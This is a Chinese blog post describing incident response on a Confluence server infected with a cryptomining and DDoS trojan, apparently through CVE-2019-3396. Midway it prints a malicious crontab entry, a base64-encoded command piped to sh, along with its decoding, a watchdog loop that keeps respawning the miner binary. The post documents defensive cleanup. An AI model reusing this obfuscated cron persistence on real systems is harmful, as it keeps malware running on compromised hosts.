confluence 挖矿木马应急响应

最近遇到一台confluence wiki主机被挖矿，收到CPU 告警异常之后，登录查看，进行分析。

top c 命令查看，果然CPU 已经资源已经被吃完了。。

看到用户是confluence，100%的肯定是confluence的RCE漏洞导致的，因为大部门的使用这个软件的都是破解版本，官方的补丁都是针对付费用户的。

具体漏洞细节：

https://github.com/jas502n/CVE-2019-3396

漏洞利用RCE：

 

处理过程：

1. 先封掉外网HTTP 端口，后续业务走VPN 通道访问

2. 查杀进程

3. 查杀完成之后，发现进程一直在启动

想到是否已经写了计划任务

crontab -l

cat /etc/crontab

都没有先关信息，最后想到应该没提权到root

crontab -l -u  confluence 查到了相关的恶意计划任务，

通过root cd /var/spool/cron/confluence

:> confluence 清空防止差生新的进程

* * * * * echo -n  "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCAyNzMxNiA+L2Rldi9udWxsIDI+JjEgOyB0aGVuIC9vcHQvYXRsYXNzaWFuL2NvbmZsdWVuY2UvdGVtcC9ya3dwcm4gOyBmaSA7IGRvbmUgKSAmIHBpZD0kISA7IChzbGVlcCAyNSAmJiBraWxsIC05ICRwaWQpICY=" | base64 -d | sh >/dev/null 2>&1

base64 解密为：

( while : ; do sleep 5 ; if ! kill -0 27316 >/dev/null 2>&1 ; then rkwprn ; fi ; done ) & pid=$! ; (sleep 25 && kill -9 $pid) &

我的神，死循环怪不得CPU 那么高。。。

cd /opt/atlassian/confluence/temp/

删除相关恶意二进制文件，然后重启 confluence 进程，观察了5分钟左右，发现未未产生新的恶意进程。

这些文件可能都有异常.文件的时间跟故障时间，基本一致，阐述即可

再次扫描，系统正常。

4. 针对Linux的恶意二进制文件进行在线分析

微步在线可以查杀出来：

奇虎360竟然没有报毒。。。。。

还是去权威的：https://www.virustotal.com

识别出是恶意的Linux二进制程序

从刚才产生的缓存文件看，应该是集挖矿，DDoS 为一体的一个木马文件，因为看到了.ntp的隐藏目录，哈哈，别问我为什么知道

关于分析Linux的恶意二进制文件，本人太蔡！！！